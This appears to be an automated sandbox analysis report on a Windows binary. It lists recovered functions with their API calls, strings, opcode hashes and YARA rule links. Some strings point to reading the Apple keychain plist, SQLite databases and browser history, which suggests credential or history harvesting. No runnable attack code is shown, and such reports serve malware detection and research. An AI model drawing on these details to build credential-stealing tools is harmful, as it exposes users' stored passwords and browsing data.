API ID: _wcsicmp$??2@??3@_wtoiwcslen
String ID:
API String ID: 1549203181-0
Opcode ID: 567ae35796e479033978641934fe8efa79e81af9abf3b8ba23fb9af2cd80c235
Instruction ID: 2e88af878a7a0ebae712eab1be6a0374a06ab0ac9bbd2c3eb3becf244d067ed8
Opcode Fuzzy Hash: 567ae35796e479033978641934fe8efa79e81af9abf3b8ba23fb9af2cd80c235
Instruction Fuzzy Hash: C3416D31900204EBEF21DF59C5C4A9DBBB4EF45319F1546BAEC09EB3A6D638D940CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E51C, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0040E55F
memcpy.MSVCRT ref: 0040E589
memcpy.MSVCRT ref: 0040E5AD

Strings

@|=D, xrefs: 0040E5A6

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: @|=D
API String ID: 3510742995-4242725666
Opcode ID: df00fe4d456d847bcc816d9924c913a63d4017986857a83741e135789728a0a6
Instruction ID: e04d1c669876fac24280ac48723ffca9e388da4b41f072ca806e7767fffd92f4
Opcode Fuzzy Hash: df00fe4d456d847bcc816d9924c913a63d4017986857a83741e135789728a0a6
Instruction Fuzzy Hash: 19113BF29003047BDB348E66DC84C5A77A8EB603987000E3EF90696291F675DF69C6D8

Uniqueness

Uniqueness Score: -1.00%

Function 00412D4A, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00412D6B

Strings

-+A, xrefs: 00412D55
-+A, xrefs: 00412D4D
Y,A, xrefs: 00412E25

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID: -+A$-+A$Y,A
API String ID: 2221118986-4154596189
Opcode ID: e10b50a88832c8eca0fe984cc6704273a4110daab6733b6ac7d2fab50901f5f0
Instruction ID: 1dfdef816599cc938eba6c7f1cf8632c899ce6bbbbec6bb0dc4dd89a5a59c02f
Opcode Fuzzy Hash: e10b50a88832c8eca0fe984cc6704273a4110daab6733b6ac7d2fab50901f5f0
Instruction Fuzzy Hash: 482156799417008FD3268F0AFE0565AB7E5FBE2702724413FE201D62B2D7B4489A8F8C

Uniqueness

Uniqueness Score: -1.00%

Function 004084EE, Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00408523
memset.MSVCRT ref: 00408534
memcpy.MSVCRT ref: 00408540
??3@YAXPAX@Z.MSVCRT ref: 0040854D

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: af55a290a049585f4a789644ebda92ab2dfba96c6af2a809d8ac02bd9773f267
Instruction ID: d20edd04bd2483e58964879576c48f2ebc5a647496c0cba51e85d391a6ad2c86
Opcode Fuzzy Hash: af55a290a049585f4a789644ebda92ab2dfba96c6af2a809d8ac02bd9773f267
Instruction Fuzzy Hash: 0D118C71204601AFD328DF2DCA91A26F7E5FFD8340B60892EE4DAC7385EA75E801CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00411A90, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411ABC

Part of subcall function 00407BF7: _snwprintf.MSVCRT ref: 00407C3C
Part of subcall function 00407BF7: memcpy.MSVCRT ref: 00407C4C

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00411AE5
memset.MSVCRT ref: 00411AEF
GetPrivateProfileStringW.KERNEL32 ref: 00411B11

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: d6b06db8244673818a3f3970d82af9b7ba7535b9122898fd49e4c505e6d5cf51
Instruction ID: 7dd1a1e3bfb09d1cc1018fb107044e1a6d1141f919409e292c6c821828e7f11b
Opcode Fuzzy Hash: d6b06db8244673818a3f3970d82af9b7ba7535b9122898fd49e4c505e6d5cf51
Instruction Fuzzy Hash: 48118271500119BFEF11AF61DD02EDE7BB9EF04741F100066FF05B2060E675AA608BAD

Uniqueness

Uniqueness Score: -1.00%

Function 004123CC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 004123DC
SHBrowseForFolderW.SHELL32(?), ref: 0041240E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00412422
wcscpy.MSVCRT ref: 00412435

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: BrowseFolderFromListMallocPathwcscpy
String ID:
API String ID: 3917621476-0
Opcode ID: 9e530e736623199f8d1c4572649b675cce8d33ce20fed77073f00f2ac51ce3c2
Instruction ID: 5cda3e6a61a15ee9057d47663b3b2e0c0e874c437a77379260a47c7555d96391
Opcode Fuzzy Hash: 9e530e736623199f8d1c4572649b675cce8d33ce20fed77073f00f2ac51ce3c2
Instruction Fuzzy Hash: C5110CB5A00208AFDB00DFA9D9889EEB7F8FF49714F10406AE905E7200D779EB45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0042D603, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042D63E
memset.MSVCRT ref: 0042D648
memcpy.MSVCRT ref: 0042D673

Strings

sqlite_master, xrefs: 0042D616

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memset
String ID: sqlite_master
API String ID: 438689982-3163232059
Opcode ID: cbab1ddc9ac3410ad1cf84db35b40c80d29ec42151ab6fd04210e0215871e9bd
Instruction ID: ee6e5cfbbe52718914f41d47f1c84030a85cc49ac4fd556a51d86816da10b362
Opcode Fuzzy Hash: cbab1ddc9ac3410ad1cf84db35b40c80d29ec42151ab6fd04210e0215871e9bd
Instruction Fuzzy Hash: 6901B972900218BAEB11EFB18D42FDDB77DFF04315F50405AF60462142D77A9B15C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0040CECE, Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D

_snwprintf.MSVCRT ref: 0040CEFB
SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040CF60

Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2

_snwprintf.MSVCRT ref: 0040CF26
wcscat.MSVCRT ref: 0040CF39

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
String ID:
API String ID: 822687973-0
Opcode ID: da7172e30ee21136588dfdb1db0da8cff5898300858bdeb9120db96eb62abdf4
Instruction ID: 10942a5e8a652da15fc5691646fc128facbf295aae85401a998ce48512d7e6da
Opcode Fuzzy Hash: da7172e30ee21136588dfdb1db0da8cff5898300858bdeb9120db96eb62abdf4
Instruction Fuzzy Hash: 8F0184B19403057AE720E775DC8AFBB73ACAF40709F04046AB719F21C3DA79A9454A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00414C63, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74E05970,?,00414D8E,?), ref: 00414C81
malloc.MSVCRT ref: 00414C88
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74E05970,?,00414D8E,?), ref: 00414CA7
free.MSVCRT(00000000,?,74E05970,?,00414D8E,?), ref: 00414CAE

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$freemalloc
String ID:
API String ID: 2605342592-0
Opcode ID: e1cd2b73c96639b283147803c5e2f0a2299dd018b03378eaee566884a8c47b85
Instruction ID: 08e12ed7d8240a3e2c5be9bdce3f46534c50a62d4f36ceba048af803e5c5c189
Opcode Fuzzy Hash: e1cd2b73c96639b283147803c5e2f0a2299dd018b03378eaee566884a8c47b85
Instruction Fuzzy Hash: CBF0E9B260A21D7E76006FB59CC0C3B7B9CD7863FDB21072FF510A2180F9659C0116B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041538D, Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004153AA
UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004153CA
LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 004153D6
GetLastError.KERNEL32 ref: 004153E4

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$ErrorLastLockUnlockmemset
String ID:
API String ID: 3727323765-0
Opcode ID: 0612512dbcb25e72840826b50eff5f9555e3619a56fe643e0148ba0517731135
Instruction ID: b4c6314a975e1eba122d49f899d78a16df92238a1a9f5a4b2f2908291fae13bb
Opcode Fuzzy Hash: 0612512dbcb25e72840826b50eff5f9555e3619a56fe643e0148ba0517731135
Instruction Fuzzy Hash: 7201D131100608FFDB219FA4EC848EBBBB8FB80785F20442AF912D6050D6B09A44CF25

Uniqueness

Uniqueness Score: -1.00%

Function 00401B06, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401B27

Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA

wcslen.MSVCRT ref: 00401B40
wcslen.MSVCRT ref: 00401B4E

Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0

Strings

Apple Computer\Preferences\keychain.plist, xrefs: 00401B3A, 00401B3F, 00401B67

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$FolderPathSpecialmemsetwcscatwcscpy
String ID: Apple Computer\Preferences\keychain.plist
API String ID: 3183857889-296063946
Opcode ID: 8006b7ae7f5b9b2d5e72903c8d65ba76eb4ffe7052016a765288ea2a00793178
Instruction ID: 16ca9930086f175389a7ca6d9dd60f6601f6a2e2e4035c9292d9b79f31a3f5d2
Opcode Fuzzy Hash: 8006b7ae7f5b9b2d5e72903c8d65ba76eb4ffe7052016a765288ea2a00793178
Instruction Fuzzy Hash: F8F0FE7290531476E720A7559C89FDA736C9F00318F6005B7F514E10C3F77CAA5446AD

Uniqueness

Uniqueness Score: -1.00%

Function 00403081, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004030A6
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 004030C3
strlen.MSVCRT ref: 004030D5
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004030E6

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: c176ff0dcd1864958a99801ca3c2895d6322cf952761f758445de8014ee40b91
Instruction ID: e51875297eda531c80c3ec5ec415ee795d437164a5b9689062039e3667910632
Opcode Fuzzy Hash: c176ff0dcd1864958a99801ca3c2895d6322cf952761f758445de8014ee40b91
Instruction Fuzzy Hash: 56F04FB680022CBEFB15AB949DC5DEB776CDB04254F0001A2B709E2041E5749F448B78

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA53, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040BA78
WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,00443980,00000000,00000000,00000000,?,00000000,00000000), ref: 0040BA91
strlen.MSVCRT ref: 0040BAA3
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040BAB4

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: 75b273bda8818eb1e049dc1d4f8bf93ad7451d7bf5c27d1061f7569d94d81c1b
Instruction ID: f1b04ddda804f0d23e85d9b3a1a681265272c1a7bd8491b11875ee0cd1c6d5d4
Opcode Fuzzy Hash: 75b273bda8818eb1e049dc1d4f8bf93ad7451d7bf5c27d1061f7569d94d81c1b
Instruction Fuzzy Hash: 7CF06DB780022CBEFB059B94DDC9DEB77ACDB04258F0001A2B709E2042E6749F44CB78

Uniqueness

Uniqueness Score: -1.00%

Function 0041176D, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 004076CD: memset.MSVCRT ref: 004076EC
Part of subcall function 004076CD: GetClassNameW.USER32 ref: 00407703
Part of subcall function 004076CD: _wcsicmp.MSVCRT ref: 00407715

SetBkMode.GDI32(?,00000001), ref: 00411794
SetBkColor.GDI32(?,00FFFFFF), ref: 004117A2
SetTextColor.GDI32(?,00C00000), ref: 004117B0
GetStockObject.GDI32(00000000), ref: 004117B8

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
String ID:
API String ID: 764393265-0
Opcode ID: 5fbb731d4b6b530c812bc277fef4d25e3eb5586c38ca31f5bfd49ebc1fc19f48
Instruction ID: 4524e9a356975b07e10c0673c8b36924071ef161512cc5bea393be377801c3c3
Opcode Fuzzy Hash: 5fbb731d4b6b530c812bc277fef4d25e3eb5586c38ca31f5bfd49ebc1fc19f48
Instruction Fuzzy Hash: 9AF0A435100209BBDF112F64DC05BDD3F61AF05B25F104636FA25541F5CF769990D648

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA51, Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0040FA6B
memcpy.MSVCRT ref: 0040FA7D
GetModuleHandleW.KERNEL32(00000000), ref: 0040FA90
DialogBoxParamW.USER32 ref: 0040FAA4

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: 5af77e421d670d3e9d53a45b82afc890927493f23d8260cf4e85c54301f9f1bc
Instruction ID: 350a086b8d7ad7ad16c9f4c49a9849c7d3de4f0e2d0f3119e9b48998a0ebe44a
Opcode Fuzzy Hash: 5af77e421d670d3e9d53a45b82afc890927493f23d8260cf4e85c54301f9f1bc
Instruction Fuzzy Hash: 49F0A731680310BBEB70AFA4BD4AF163A919705F57F20043AF644A60E2C7B585558B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004048C7, Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 004048DE

Part of subcall function 00412455: LoadLibraryW.KERNEL32(shlwapi.dll,769048C0,?,004048E6,00000000), ref: 0041245E
Part of subcall function 00412455: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0041246C
Part of subcall function 00412455: FreeLibrary.KERNEL32(00000000,?,004048E6,00000000), ref: 00412484

GetDlgItem.USER32 ref: 004048F0
GetDlgItem.USER32 ref: 00404902
GetDlgItem.USER32 ref: 00404914

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Item$Library$AddressFreeLoadProc
String ID:
API String ID: 2406072140-0
Opcode ID: a8f7eca7071bb80bc984f3ec153cc5aff345bc84215bcc68ba7b850d09515bab
Instruction ID: 27d5e7a410d711f85fb169ee5f4284aad0304eb1bf7711d039073b83f91ac3c5
Opcode Fuzzy Hash: a8f7eca7071bb80bc984f3ec153cc5aff345bc84215bcc68ba7b850d09515bab
Instruction Fuzzy Hash: 33F01CB18043026BCB313F72DC09D6FBAADEF84310B010D2EA1D1D61A1CFBE94618A98

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA3A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000010,00000000,00000000), ref: 0040DA6F
InvalidateRect.USER32(?,00000000,00000000), ref: 0040DABB

Strings

<M@, xrefs: 0040DC3B

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InvalidateMessageRectSend
String ID: <M@
API String ID: 909852535-3778786622
Opcode ID: 34262e1ccb1ccbcc0d13218f904e640cd746ad35dcac150ad02d22c2cfc9d8bc
Instruction ID: 05eea1ce1b03382e5db893e26ff0cd35ef39184770bc15fe2d13ad66f6086966
Opcode Fuzzy Hash: 34262e1ccb1ccbcc0d13218f904e640cd746ad35dcac150ad02d22c2cfc9d8bc
Instruction Fuzzy Hash: 89518430E003049ADB20AFA5C845F9EB3A5AF44324F51853BF4197B1E2CAB99D89CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040BABE, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 0040BB00
wcschr.MSVCRT ref: 0040BB0E

Part of subcall function 004080BF: wcslen.MSVCRT ref: 004080DB
Part of subcall function 004080BF: memcpy.MSVCRT ref: 004080FE

Strings

", xrefs: 0040BB4A

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcschr$memcpywcslen
String ID: "
API String ID: 1983396471-123907689
Opcode ID: 8e9dacec36b22f36b3d6a2c9acf4b3c337cfe9fd3fa69281ad6b0cf09b24f830
Instruction ID: 425732c6536ade4c189e7d45363e94d8349111ce0189a23fa1b0a907d348dab1
Opcode Fuzzy Hash: 8e9dacec36b22f36b3d6a2c9acf4b3c337cfe9fd3fa69281ad6b0cf09b24f830
Instruction Fuzzy Hash: D2317E31904204ABDF04EFA5C8419EEB7F8EF44364B20816BE855B72D5DB78AA41CADC

Uniqueness

Uniqueness Score: -1.00%

Function 0040928C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00407BD1: SetFilePointer.KERNEL32(00409553,?,00000000,00000000,?,0040935E,00000000,00000000,?,00000020,?,004094E9,?,?,00409553,00000000), ref: 00407BDE

_memicmp.MSVCRT ref: 004092A6
memcpy.MSVCRT ref: 004092BD

Strings

URL , xrefs: 004092A0

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer_memicmpmemcpy
String ID: URL
API String ID: 2108176848-3574463123
Opcode ID: cd6c5101a0353fed1380e8074d20d0c9319d1f79348dd7d2e07b117509aaf2a7
Instruction ID: 33b3fc867a4e2474f07ea88972ed825a8fcb80c5477311fdb059a6d734a7dbfa
Opcode Fuzzy Hash: cd6c5101a0353fed1380e8074d20d0c9319d1f79348dd7d2e07b117509aaf2a7
Instruction Fuzzy Hash: 8411A031604208BBEB11DF29CC05F5F7BA8AF85348F054066F904AB2D2E775EE10CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407BF7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00407C3C
memcpy.MSVCRT ref: 00407C4C

Strings

%2.2X , xrefs: 00407C31

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 67cc605bc3185a31bfa90e7c216e456876c101feb6316f2713b0a5e7acf2aabe
Instruction ID: 0f19ce75f7d61601c6dcaf4457f6717ff276ffca2b35b3dd887d371e09c964f6
Opcode Fuzzy Hash: 67cc605bc3185a31bfa90e7c216e456876c101feb6316f2713b0a5e7acf2aabe
Instruction Fuzzy Hash: 87117C32908209BEEB10DFE8C9C69AE73A8BB45714F108436ED15E7141D678AA158BA6

Uniqueness

Uniqueness Score: -1.00%

Function 004153F4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,00415610,?,00000000), ref: 0041542C
CloseHandle.KERNEL32(?), ref: 00415438

Strings

!-A, xrefs: 00415417

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandleUnmapView
String ID: !-A
API String ID: 2381555830-3879722540
Opcode ID: e8c78a8d6966c789a432285f25c1a97e3c9752e60e4576fb47e50e48bcd826d3
Instruction ID: 6c5ed3bf8746cf55bcd37c1067f9027f6bc59eb5530dee428a664ff8177fa162
Opcode Fuzzy Hash: e8c78a8d6966c789a432285f25c1a97e3c9752e60e4576fb47e50e48bcd826d3
Instruction Fuzzy Hash: 5611BF35500B10DFCB319F25E945BD777E0FF84712B00492EE4929A662C738F8C48B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040BD3E
_snwprintf.MSVCRT ref: 0040BD5E

Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192

Strings

%%-%d.%ds , xrefs: 0040BD33

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintf$FileWritewcslen
String ID: %%-%d.%ds
API String ID: 889019245-2008345750
Opcode ID: 0621875c29823bfdd60080e68f211d35d61c8b83eb007e49ef2e77d3973846ff
Instruction ID: f6bde454874e3f12fe5a715dcb314e2825e8b387052435345983f70e28f49e73
Opcode Fuzzy Hash: 0621875c29823bfdd60080e68f211d35d61c8b83eb007e49ef2e77d3973846ff
Instruction Fuzzy Hash: 1D01D871500604BFD7109F69CC82D6AB7F9FF48318B10442EF946AB2A2DB75F841DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00408116, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00408125
_memicmp.MSVCRT ref: 00408153

Strings

History, xrefs: 0040811F, 00408124, 00408151

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memicmpwcslen
String ID: History
API String ID: 1872909662-3892791767
Opcode ID: bae70ed05e2484058d162cab4743c52f8bd5b62447447ec07eacc4e847ca5ebf
Instruction ID: 2715e0f5b76d9e8bf3bfa22bf35e41ec2dcc8bed56e6222f305abdff7d2b472d
Opcode Fuzzy Hash: bae70ed05e2484058d162cab4743c52f8bd5b62447447ec07eacc4e847ca5ebf
Instruction Fuzzy Hash: 7BF0A4721046029BD210EA299D41A2BB7E8DF813A8F11093FF4D196282DF79DC5646A9

Uniqueness

Uniqueness Score: -1.00%

Function 00407B1D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetSaveFileNameW.COMDLG32(?), ref: 00407B6C
wcscpy.MSVCRT ref: 00407B83

Strings

X, xrefs: 00407B51

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileNameSavewcscpy
String ID: X
API String ID: 3080202770-3081909835
Opcode ID: 24396636a29f1ce25200a1500eee54acd60350c694163d5da58a3a079e5601d4
Instruction ID: df6fc214ccc966a4ef74be52ccb1fa8de01b9f2d97edd1d3ec6f174b54628a36
Opcode Fuzzy Hash: 24396636a29f1ce25200a1500eee54acd60350c694163d5da58a3a079e5601d4
Instruction Fuzzy Hash: C801E5B1E002499FDF00DFE9D8847AEBBF4AF08319F10402AE815E6280DB78A949CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC82, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040AC9A
SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040ACC9

Strings

", xrefs: 0040ACC2

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessageSendmemset
String ID: "
API String ID: 568519121-123907689
Opcode ID: 25315a415076cbab8121a395ef60f2b275a5e49d8e8cab10b2ef02e751b77d98
Instruction ID: c9b4fa4cd35477e261f68ac5278df415403352ef960fa58aa17ae8539a272808
Opcode Fuzzy Hash: 25315a415076cbab8121a395ef60f2b275a5e49d8e8cab10b2ef02e751b77d98
Instruction Fuzzy Hash: 4E01D635800304EBEB20DF5AC841AEFB7F8FF84745F01802AE854A6281D3349955CF79

Uniqueness

Uniqueness Score: -1.00%

Function 004017B7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?,?,?,?,0040D8F3,?,General,?,?,?,?,?,00000000,00000001), ref: 004017E0
memset.MSVCRT ref: 004017F3

Strings

WinPos, xrefs: 00401806

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PlacementWindowmemset
String ID: WinPos
API String ID: 4036792311-2823255486
Opcode ID: ebc0bb48f8a97b617363729f7cf0900b593d1d2e388969c7686af9c2b4b0c1d2
Instruction ID: 403492ab1ae1e8e085d1b686bd15613ed323b870b3f74ac0ef6546771a88dbd4
Opcode Fuzzy Hash: ebc0bb48f8a97b617363729f7cf0900b593d1d2e388969c7686af9c2b4b0c1d2
Instruction Fuzzy Hash: BDF0FF71600204ABEB14EFA5D989F6E73E8AF04700F544479E9099B1D1D7B899008B69

Uniqueness

Uniqueness Score: -1.00%

Function 00407AB6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00407AFF
wcscpy.MSVCRT ref: 00407B0D

Strings

X, xrefs: 00407AE0

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileNameOpenwcscpy
String ID: X
API String ID: 3246554996-3081909835
Opcode ID: 7dbed658630cd8f1005308aafbad7de56d353a569406e82a8f6fc1bcbb586f5c
Instruction ID: 22468463e432baa7279a8bf0e718ba1534ae3331c134da9758c07f59fbfd6832
Opcode Fuzzy Hash: 7dbed658630cd8f1005308aafbad7de56d353a569406e82a8f6fc1bcbb586f5c
Instruction Fuzzy Hash: 6601B2B1D0024CAFCB40DFE9D8856CEBBF8AF09708F10802AE819F6240EB7495458F54

Uniqueness

Uniqueness Score: -1.00%

Function 00415B47, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001300,?,?,?,?), ref: 00415B56

Part of subcall function 00414D24: AreFileApisANSI.KERNEL32 ref: 00414D2B
Part of subcall function 00414D24: MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D49
Part of subcall function 00414D24: malloc.MSVCRT ref: 00414D53
Part of subcall function 00414D24: MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D6A
Part of subcall function 00414D24: free.MSVCRT(?), ref: 00414D73

LocalFree.KERNEL32(?), ref: 00415B71

Strings

OsError 0x%x (%u), xrefs: 00415B83

Memory Dump Source

